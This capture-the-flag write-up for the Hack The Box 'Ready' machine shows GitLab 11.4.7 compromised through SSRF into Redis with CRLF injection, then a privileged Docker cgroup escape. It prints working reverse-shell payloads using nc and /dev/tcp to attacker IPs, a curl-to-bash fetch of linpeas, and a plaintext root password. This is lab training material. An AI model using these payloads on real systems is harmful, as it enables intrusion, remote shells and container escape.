HTB Ready Writeup

Recon

Nmap scan

Lets start with enumerating the open ports on the machine.

┌─[user@parrot]─[~/Desktop/htb/ready]
└──╼ $ nmap -sC -sV -oA nmap 10.10.10.220
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-23 17:47 BST
Nmap scan report for 10.10.10.220
Host is up (0.36s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
5080/tcp open  http    nginx
| http-robots.txt: 53 disallowed entries (15 shown)
| / /autocomplete/users /search /api /admin /profile
| /dashboard /projects/new /groups/new /groups/*/edit /users /help
|_/s/ /snippets/new /snippets/*/edit
| http-title: Sign in · GitLab
|_Requested resource was http://10.10.10.220:5080/users/sign_in
|_http-trane-info: Problem with XML parsing of /evox/about
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/.
Nmap done: 1 IP address (1 host up) scanned in 66.29 seconds

We observe that two ports are open in this machine. Port 22 which is standard
for SSH connections and port 5080 which is hosting GitLab.
Port 22 does not seem to be vulnerable so let’s focus on port 5080.

GitLab

Lets open GitLab in the browser
http://10.10.10.220:5080

Lets try and see if we can register for an account.

The registration was successful, after poking it around for a bit, we notice
the GitLab version number which is 11.4.7.

After searching for vulnerabilities on this specific version, I found a video
by LiveOverFlow explaining this vulnerability. I highly recommend watching
this video: youtube link

Foothold

Scrutinizing the commits from the official GitLab repo, we find GitLab 11.4.7
has the following security issues:

ssrf (server side request forgery)

SSRF in our case is used to bypass the block url check in ‘import project from
url’.

Exploit

After searching about the security issue, the exploit method is as follows

SSRF -> Redis -> RCE

But redis has implemented a procedure to counter this specific attack, and it
will disconnect when a POST or ‘Host:’ header is sent.

We can then use the CRLF Carriage Return and Line Feed to insert ‘\n’ in front
of ‘Host:’ to avoid redis attack checks.
So are modified exploit method is as follows

SSRF -> Redis -> CRLF -> RCE

As mentioned in the video, we use this PoC on GitLab for RCE:

A
multi
sadd resque:gitlab:queues system_hook_push
lpush resque:gitlab:queue:system_hook_push "{\"class\":\"GitlabShellWorker\",\"args\":[\"class_eval\",\"open('|whoami | nc 192.241.233.143 80').read\"],\"retry\":3,\"queue\":\"system_hook_push\",\"jid\":\"ad52abc5641173e217eb2e52\",\"created_at\":1513714403.8122594,\"enqueued_at\":1513714403.8129568}"
exec

We create a new project in GitLab

In Import project > Repo by url > Git repository URL we utilize the above
SSRF.

git://[0:0:0:0:0:ffff:127.0.0.1]:6379/test

We now submit and then intercept the request using burpsuite.

We start a netcat listener on our local machine.

We then change the request in burpsuite to the following:

multi
sadd resque:gitlab:queues system_hook_push
lpush resque:gitlab:queue:system_hook_push "{\"class\":\"GitlabShellWorker\",\"args\":[\"class_eval\",\"open('|nc -e /bin/bash 10.10.16.21 9899').read\"],\"retry\":3,\"queue\":\"system_hook_push\",\"jid\":\"ad52abc5641173e217eb2e52\",\"created_at\":1513714403.8122594,\"enqueued_at\":1513714403.8129568}"
exec
exec
exec

We send the request and get the following response along with a reverse shell
on our listener.

We now find whether python is available, to get a tty.

Python is installed and we run the following command to get tty.

python3 -c 'import pty;pty.spawn("/bin/bash")'

We now navigate around the box to get the user flag.

Privilege Esclation

linPEAS

Now lets use linPEAS for privesc enumeration.

python -m http.server 8081

git@gitlab:~$ curl http://10.10.16.21:8081/linpeas.sh | bash

We see an odd directory in /opt/

Finding in the directory for potential passwords using the following command
and we get a password.

cat * | grep password

wW59U!ZKMbG9+*#h

We try switch the user to root with the above password, and the password
works.

Now lets get the root flag and we’re done.

Something’s wrong, we are getting a file not found error for the root flag.
This generally means the box needs a reset.
After multiple resets, the root.txt file was missing. So now its clear that we
are in some kind of protected environment.

Breaking out of docker environment

We notice that we are in a docker environment, and need to break out from
it.
I found this awesome guide to do it.

The –privileged flag introduces significant security concerns, and the
exploit relies on launching a docker container with it enabled. When using
this flag, containers have full access to all devices.

mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
echo 1 > /tmp/cgrp/x/notify_on_release
host_path=sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab
echo “$host_path/cmd” > /tmp/cgrp/release_agent

#For a normal PoC =================
echo ‘#!/bin/sh’ > /cmd
echo “ps aux > $host_path/output” >> /cmd
chmod a+x /cmd
#===================================
#Reverse shell
echo ‘#!/bin/bash’ > /cmd
echo “bash -i >& /dev/tcp/10.10.16.21/9777 0>&1” >> /cmd
chmod a+x /cmd
#===================================

sh -c “echo $$ > /tmp/cgrp/x/cgroup.procs”
head /output

We run the above commands one by one in the docker environment.

We also start a netcat listner on our local machine to get the reverse shell.

And finally we get the root flag.